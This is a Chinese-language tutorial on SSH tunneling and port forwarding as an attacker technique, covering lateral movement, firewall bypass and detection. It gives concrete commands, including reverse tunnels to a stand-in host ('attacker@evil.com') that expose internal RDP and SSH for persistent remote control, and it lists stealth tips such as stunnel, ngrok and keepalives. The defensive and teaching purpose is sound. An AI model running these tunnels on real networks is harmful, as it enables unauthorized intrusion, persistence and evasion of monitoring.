SSH隧道与端口转发攻击详解 核心概念描述 SSH隧道与端口转发是一种利用SSH协议加密通道建立网络连接的技术，在合法场景中用于安全访问内网服务，但在攻击中常被用作横向移动、绕过防火墙、建立隐蔽C2（命令与控制）通道的手段。攻击者通过植入SSH密钥或窃取凭据，在受控主机上建立加密隧道，将内网端口暴露到外部，或反向将攻击者服务映射到内网。 技术原理分步解析 SSH隧道基础 ： SSH协议支持“端口转发”功能，本质是在SSH客户端和服务器之间建立加密的TCP通道，转发指定端口的数据。其依赖SSH认证（密码/密钥），转发过程对原始应用透明。 三种转发模式 ： 本地端口转发（-L） ：将攻击者本地端口绑定到目标内网服务。命令格式： ssh -L 本地端口:目标主机:目标端口 跳板机用户@跳板机IP 例如，通过已控制的Web服务器（跳板机）访问内网数据库： ssh -L 8080:192.168.1.100:3306 user@web-server 此后访问攻击者本地的 127.0.0.1:8080 即等效访问内网数据库的3306端口。 远程端口转发（-R） ：将目标内网端口暴露到攻击者服务器。常用于突破出口防火墙限制。命令格式： ssh -R 攻击者端口:内网主机:内网端口 攻击者用户@攻击者服务器 例如，在内网受控主机上执行： ssh -R 2222:192.168.1.1:3389 attacker@evil.com 攻击者即可通过访问 evil.com:2222 连接到内网域控的RDP服务。 动态端口转发（-D） ：在攻击者本地创建SOCKS代理，通过跳板机动态转发所有TCP请求。命令： ssh -D 1080 user@jump-host 配置浏览器代理为 SOCKS5://127.0.0.1:1080 ，即可通过跳板机访问任意内网地址。 攻击利用场景演示 场景1：横向移动绕过防火墙 攻击者已控制DMZ区的Linux服务器（IP:10.0.0.5），发现内网存在数据库服务器（IP:192.168.1.10:5432，仅允许10.0.0.0/24访问）。 在DMZ服务器上建立本地转发： ssh -f -N -L 5433:192.168.1.10:5432 user@10.0.0.5 攻击者连接 10.0.0.5:5433 即可访问数据库，防火墙规则未阻止SSH流量（22端口）。 场景2：反向隧道维持持久访问 内网Windows主机被渗透，但无法直接从外部连接。攻击者在其上植入SSH客户端，通过计划任务执行： ssh -f -N -R 4444:127.0.0.1:22 attacker@evil.com -o ServerAliveInterval=60 攻击者服务器（evil.com）的sshd配置需启用 GatewayPorts yes 以允许远程绑定。此后通过 ssh -p 4444 localhost 即可反向控制内网主机。 场景3：组合代理穿透多层网络 通过多层跳板建立链式隧道： ssh -L 1080:host2:1080 user@host1 在host1上配置动态转发到host2，再在host2转发到目标网段，实现深度内网探测。 隐蔽性增强技巧 端口复用 ：通过SSH的 -J 参数或ProxyCommand绕过端口监控，或将隧道绑定到HTTPS（443）等常见端口。 流量伪装 ：使用工具如 stunnel 将SSH流量封装在TLS中，或利用云服务的反向代理（如ngrok）隐蔽入口。 空闲连接保持 ：添加 -o ServerAliveInterval=30 参数维持长连接，避免防火墙会话超时断开。 检测与防御措施 网络层检测 ： 监控非常规SSH连接模式（如长时间空闲、高频心跳包）。 分析网络流量的TLS指纹，识别非标准SSH实现流量。 主机层防御 ： 限制SSH用户权限，禁止非管理员使用端口转发（在 sshd_config 中设置 AllowTcpForwarding no 、 PermitOpen 指定允许端口）。 使用网络命名空间或容器隔离敏感主机的网络栈。 纵深防御策略 ： 部署网络微隔离，限制SSH跳板机仅能访问必要服务。 定期审计SSH授权密钥与连接日志，排查异常远程转发记录。 采用零信任网络架构，所有内网访问需持续验证，而非依赖单一隧道。 进阶攻防演进 高级攻击者会结合SSH证书认证、多路复用（ControlMaster）减少连接特征，或利用HTTP/2 over SSH规避DPI检测。防御方需结合行为分析（如某主机突然作为代理转发大量流量）与端点EDR联动，实时阻断异常SSH子进程。 通过以上步骤，可全面理解SSH隧道在攻击中的利用方式及其对抗逻辑，实际渗透测试中需在授权范围内验证相关配置缺陷。